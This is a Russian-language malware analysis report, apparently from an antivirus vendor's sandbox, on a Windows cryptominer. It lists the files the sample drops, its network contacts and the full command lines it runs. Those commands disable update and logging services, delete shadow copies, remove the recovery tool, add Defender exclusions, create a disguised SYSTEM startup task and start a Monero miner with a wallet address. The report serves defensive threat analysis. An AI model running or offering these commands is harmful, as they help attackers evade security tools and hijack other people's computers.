Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\wmi provider host
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует запуск следующих системных утилит:
- Обновления системы (Windows Update)
- Системный антивирус (Защитник Windows)
блокирует:
- Среду восстановления Windows (Windows Recovery Environment)
- Журнал событий Windows (Windows Event Logging)
удаляет теневые копии разделов.
добавляет исключения антивируса:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath 'C:\Users\'; Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\'; Add-MpPreference -ExclusionPath '%WINDIR%...
Изменения в файловой системе
Создает следующие файлы
- nul
- %ALLUSERSPROFILE%\microsoft\winmsips.{208d2c60-3aea-1069-a2d7-08002b30309d}\wmiprvse.exe
- %WINDIR%\temp\__psscriptpolicytest_uoslf1y0.o2t.ps1
- %WINDIR%\temp\__psscriptpolicytest_zzr0ytl1.tzf.psm1
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-09-357.dump
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-09-627.dump
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-09-784.dump
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-09-996.dump
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-10-039.dump
- %WINDIR%\temp\__psscriptpolicytest_nogmhobv.hi3.ps1
- %WINDIR%\temp\__psscriptpolicytest_al2ky3p0.m20.psm1
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-10-412.dump
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-10-459.dump
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-10-528.dump
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-10-701.dump
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-10-867.dump
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-11-007.dump
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-11-289.dump
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-11-331.dump
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-11-374.dump
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-11-405.dump
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-11-490.dump
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-11-554.dump
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-11-596.dump
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-12-128.dump
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-12-213.dump
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-12-260.dump
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-12-269.dump
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-12-333.dump
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-12-365.dump
- %WINDIR%\temp\content\4912-4344-powershell.exe-02-15-13-019.dump
- <SYSTEM32>\config\systemprofile\appdata\local\microsoft\windows\powershell\startupprofiledata-noninteractive
- <SYSTEM32>\config\systemprofile\appdata\roaming\microsoft\winmslpc.{208d2c60-3aea-1069-a2d7-08002b30309d}\svchost.exe
- <SYSTEM32>\config\systemprofile\appdata\roaming\microsoft\winmslpc.{208d2c60-3aea-1069-a2d7-08002b30309d}\winring0x64.sys
Удаляет файлы, которые сам же создал
- %WINDIR%\temp\__psscriptpolicytest_uoslf1y0.o2t.ps1
- %WINDIR%\temp\__psscriptpolicytest_zzr0ytl1.tzf.psm1
- %WINDIR%\temp\__psscriptpolicytest_nogmhobv.hi3.ps1
- %WINDIR%\temp\__psscriptpolicytest_al2ky3p0.m20.psm1
Самоперемещается
- из <Полный путь к файлу> в \:tmp
Сетевая активность
Подключается к
- 'pa###bin.com':443
- 'bm##i428.su':443
- 'po##.#upportxmr.com':443
TCP
Запросы HTTP GET
- http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?12##############
Другие
- 'pa###bin.com':443
- 'bm##i428.su':443
UDP
- DNS ASK pa###bin.com
- DNS ASK bm##i428.su
- DNS ASK po##.#upportxmr.com
Другое
Создает и запускает на исполнение
- '%ALLUSERSPROFILE%\microsoft\winmsips.{208d2c60-3aea-1069-a2d7-08002b30309d}\wmiprvse.exe'
- '<SYSTEM32>\config\systemprofile\appdata\roaming\microsoft\winmslpc.{208d2c60-3aea-1069-a2d7-08002b30309d}\svchost.exe' -a rx/0 -o pool.supportxmr.com:443 -u 45Bmz1x7xrjT5iN8ZyL1dCZGAB2RmTjCEDnzRH2Q7wrG9QkV321P4oeVKJzUqzeTpp6Pft487YkbGKskBAAEMP5jUbFadqg.worker -p worker -b --no-color --verbose=0 --tls --cpu-max...
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C net session >nul 2>&1
- '<SYSTEM32>\net.exe' session
- '<SYSTEM32>\net1.exe' session
- '<SYSTEM32>\sc.exe' stop wuauserv (со скрытым окном)
- '<SYSTEM32>\sc.exe' stop UsoSvc (со скрытым окном)
- '<SYSTEM32>\sc.exe' stop bits (со скрытым окном)
- '<SYSTEM32>\sc.exe' stop dosvc (со скрытым окном)
- '<SYSTEM32>\sc.exe' stop WaaSMedicSvc (со скрытым окном)
- '<SYSTEM32>\sc.exe' stop eventlog (со скрытым окном)
- '<SYSTEM32>\sc.exe' config wuauserv start= disabled (со скрытым окном)
- '<SYSTEM32>\sc.exe' config UsoSvc start= disabled (со скрытым окном)
- '<SYSTEM32>\sc.exe' config bits start= disabled (со скрытым окном)
- '<SYSTEM32>\sc.exe' config dosvc start= disabled (со скрытым окном)
- '<SYSTEM32>\sc.exe' config WaaSMedicSvc start= disabled (со скрытым окном)
- '<SYSTEM32>\sc.exe' config eventlog start= disabled (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C rmdir /S /Q "C:\\inetpub" 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c wusa /uninstall /kb:890830 /quiet /norestart >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\wusa.exe' /uninstall /kb:890830 /quiet /norestart
- '<SYSTEM32>\cmd.exe' /c "reagentc.exe /disable >nul 2>&1 && takeown /f "<SYSTEM32>\reagentc.exe" >nul 2>&1 && icacls "<SYSTEM32>\reagentc.exe" /grant administrators:F >nul 2>&1 && del /f /q "<SYSTEM32>\reagentc.exe... (со скрытым окном)
- '<SYSTEM32>\reagentc.exe' /disable
- '<SYSTEM32>\takeown.exe' /f "<SYSTEM32>\reagentc.exe"
- '<SYSTEM32>\icacls.exe' "<SYSTEM32>\reagentc.exe" /grant administrators:F
- '<SYSTEM32>\cmd.exe' /c vssadmin delete shadows /all /quiet (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /create /sc onstart /tn "WMI Provider Host" /tr "%ALLUSERSPROFILE%\Microsoft\WinMSIPS.{208D2C60-3AEA-1069-A2D7-08002B30309D}\WmiPrvSE.exe" /ru "system" /rl highest /f (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c timeout /t 5 /nobreak >nul && schtasks.exe /run /tn "WMI Provider Host" (со скрытым окном)
- '<SYSTEM32>\timeout.exe' /t 5 /nobreak
- '<SYSTEM32>\schtasks.exe' /run /tn "WMI Provider Host"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath 'C:\Users\'; Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\'; Add-MpPreference -ExclusionPath '%WINDIR%... (со скрытым окном)
- '<SYSTEM32>\config\systemprofile\appdata\roaming\microsoft\winmslpc.{208d2c60-3aea-1069-a2d7-08002b30309d}\svchost.exe' -a rx/0 -o pool.supportxmr.com:443 -u 45Bmz1x7xrjT5iN8ZyL1dCZGAB2RmTjCEDnzRH2Q7wrG9QkV321P4oeVKJzUqzeTpp6Pft487YkbGKskBAAEMP5jUbFadqg.worker -p worker -b --no-color --verbose=0 --tls --cpu-max... (со скрытым окном)
